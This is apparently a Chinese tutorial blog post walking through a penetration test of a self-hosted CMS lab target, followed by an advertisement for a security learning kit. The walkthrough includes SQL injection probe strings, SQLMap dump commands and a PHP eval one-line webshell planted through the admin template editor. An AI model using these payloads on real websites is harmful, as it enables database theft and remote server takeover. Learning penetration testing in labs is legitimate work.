网络安全攻防：Web安全之渗透测试（非常详细）零基础入门到精通，收藏这一篇就够了

本文基于某个开源的CMS搭建一个靶机，来演示Web渗透整个过程。

1. SQL注入检测

在访问网站时收集资料，了解网站的各项接口、功能，手动测试其每一个参数是否存在注入。其中发现一个带参数ID的页面，如图1所示。

图1 带参数ID的页面

通过手动注入判断该参数是否为注入点，发现当输入id=10’and‘1’=’0时返回错误页面，如图2所示。

图2 返回错误页面

而当参数id=10’and‘1’=’1时仍然显示为正确页面，由此怀疑ID参数后面的and语句内容被当作SQL语句一部分带入执行，此处可能存在SQL注入。

2. SQL注入利用

纯粹的手工注入将花费大量时间和精力，此处利用SQLMap工具对此疑似SQL注入点的参数进行判断。

利用SQLMap语句：

–u “http:/*.*.*.*/yx/index.php?r=default/column/content&col=products&id=10*”

判断该URL是否存在注入，其中，*表示判断该处参数，其结果如图3所示。

图3 判断注入结果

可见参数 id 存在布尔注入、错误回显注入、时间盲注等多种注入隐患。并且 SQLMap直接判断出其后台数据库为MySQL 5.0，服务器为Apache2.4.3，脚本环境为PHP5.6.25。

利用SQLMap继续查看数据库内容，其中利用–dbs参数查看所有数据库发现共有5个库，如图4所示。

图4 查看数据库

猜测yx_test为该CMS的数据库，继续深入查看其内容。利用–D 库名–tables可查看指定库的表名，如图5所示。

图5 查看指定库的表名

共有20张表，需要得到管理员账号密码，因此，利用–T参数指定表dump其内容。

于是得到了该表的结构以及其中数据，并反解MD5，可以获得一个登录名为admin的账号和密码654321。

3. 后台登录getshell

进入后台，如图6所示。

图6 进入后台

继续在后台管理平台上寻找可上传Webshell的方法，以取得服务器Shell权限。

在进入到全局设置下前台模板的管理模板文件功能后，发现有许多PHP文件，其中利用添加模板的功能可以直接在网页上编写PHP文件，并保存到服务器，如图7所示。

图7 编写PHP文件

利用网页编辑，写入一个一句话木马，其内容为<?php eval($\\\\\\\_POST\\\\\\\['test'\\\\\\\]);?>，写入到一个名为muma.php的文件，如图8所示。

图8 写入木马

木马写入成功，只需知道网页地址即可访问链接。

最后利用中国菜刀工具连接该木马，如图9所示。

图9 连接木马

成功连接站点，可以远程下载、上传任意文件，也可运行Shell执行代码。

学习资源

如果你是也准备转行学习网络安全（黑客）或者正在学习，这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品，旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力，熟练掌握基础攻防到深度对抗。

1、知识库价值

深度： 本知识库超越常规工具手册，深入剖析攻击技术的底层原理与高级防御策略，并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等，提供了独到的技术视角和实战验证过的对抗方案。

广度： 面向企业安全建设的核心场景（渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营），本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点，是应对复杂攻防挑战的实用指南。

实战性： 知识库内容源于真实攻防对抗和大型演练实践，通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

2、 部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式，既夯实基础技能，更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式，既夯实基础技能，更深入高阶对抗技术。

内容组织紧密结合攻防场景，辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合，是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

3、适合学习的人群

‌一、基础适配人群‌

1. ‌零基础转型者‌：适合计算机零基础但愿意系统学习的人群，资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌；
2. ‌开发/运维人员‌：具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能，实现职业方向拓展‌或者转行就业；
3. ‌应届毕业生‌：计算机相关专业学生可通过资料构建完整的网络安全知识体系，缩短企业用人适应期‌；

‌二、能力提升适配‌

1、‌技术爱好者‌：适合对攻防技术有强烈兴趣，希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌；

2、安全从业者‌：帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌；

3、‌合规需求者‌：包含等保规范、安全策略制定等内容，适合需要应对合规审计的企业人员‌；

因篇幅有限，仅展示部分资料，完整版的网络安全学习资料已经上传优快云，朋友们如果需要可以在下方优快云官方认证二维码免费领取【保证100%免费】